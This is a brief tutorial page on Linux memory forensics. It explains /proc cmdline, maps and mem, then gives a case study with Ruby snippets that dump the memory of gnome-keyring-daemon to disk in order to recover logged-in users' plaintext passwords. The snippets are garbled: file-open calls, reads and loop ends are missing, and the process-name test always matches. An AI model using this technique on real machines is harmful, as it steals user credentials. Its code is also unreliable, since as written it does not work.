Memory Forensic

Last updated 9 months ago

Linux memory

Dump Linux memory

To dump Linux memory for a specific process to disk, we need the follwoing:

  1. Get process id (PID): /proc/\[PID\]/cmdline

    • cmdline is file holds the complete command line for the process.

  2. Get PID maps: /proc/\[PID\]/maps

    • maps is file containing the currently mapped memory regions and their access permissions.

  3. Get processs memory pages: /proc/\[PID\]/mem

    • mem is a file can be used to access the pages of a process's memory through

Case study

Let's assume we want to dump gnome-keyring-daemon process's memory to our disk in order to extract the logged-in user(s) password(s) since its stored in as a plan text in memory. Moreover, we know that it comes after "libgck-1" or "libgcrypt" strings in memory. We'll brack that a parts then put it together.

Get process id (PID)

@pids = []
Dir.glob('/proc/*/cmdline').each do |cmdline_file|
processes_name.each do |process|
if "gnome-keyring-daemon"
@pids << cmdline_file.split('/')[2].to_i # get the pid number from proc/nnn/cmdline

Get PID maps:

@pids_maps = []
@pids.each do |pid|
# Open and parse maps file for each pid
File.readlines("/proc/#{pid}/maps").each do |line|
address, permissions = line.split(' ').first(2)
# Find addresses in readable process memory pages
if permissions.match(/^r.*/)
# Find where pages starts and ends to read, no need to dump the whole memory.
memory_start, memory_stop = address.split('-').map{|r| r.to_i(16)}
chunk_size = memory_stop - memory_start
@pids_maps << {pid: pid, memory_start: memory_start, memory_stop: memory_stop, chunk: chunk_size}

Get processs memory pages:

memory_dump = ''
@pids_maps.each do |pid|
chunk_pointer ="/proc/#{pid[:pid]}/mem", 'rb') # Open mem file pid[:memory_start] # put reading pointer where page starts
memory_dump << chunk_pointer
end'gnome-keyring.dump', 'wb') {|f| f.print memory_dump} # Write dump to the desk as binary